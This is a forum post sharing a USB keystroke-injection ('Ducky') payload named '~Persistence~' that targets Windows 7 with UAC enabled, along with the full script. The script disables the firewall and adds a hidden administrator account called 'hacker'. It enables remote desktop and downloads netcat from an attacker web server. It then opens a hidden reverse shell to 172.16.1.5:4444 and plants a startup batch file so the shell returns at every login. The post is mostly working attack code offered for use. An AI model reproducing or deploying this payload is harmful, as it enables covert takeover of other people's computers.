Jump to content

[PAYLOAD] ~Persistence~ Windows 7 w/UAC


skysploit
 Share

Recommended Posts

Hello,

Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it...

  1. Opens an admin command prompt
  2. Creates an admin user (default creds: hacker | mysecretpassword)
  3. Disables the windows firewall
  4. Enables remote desktop
  5. Enables remote assistance
  6. Hides the newly created admin account from the Windows Welcome Screen
  7. Creates a VBScript to run a hidden instance of Netcat
  8. Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop)
  9. Downloads netcat from the attackers web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe)(launch apache by using: service apache2 start)
  10. Calls the VBScript to launch the hidden netcat shell
  11. Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs)

So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend.

~skysploit

DELAY 5000
ESCAPE
DELAY 300
CONTROL ESCAPE
DELAY 300
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
DELAY 300
ENTER
DELAY 800
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add
ENTER
DELAY 200
STRING y
ENTER
DELAY 400
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING copy con nc.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL z
ENTER
STRING echo cmdow @ /hid >> nc.bat
ENTER
STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe,c:\Windows\system32\nc.exe');
ENTER
STRING cscript nc.vbs
ENTER
STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\
ENTER
STRING echo cmdow @ /hid >> persistence.bat
ENTER
STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat
ENTER
STRING exit
ENTER
Edited by skysploit
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...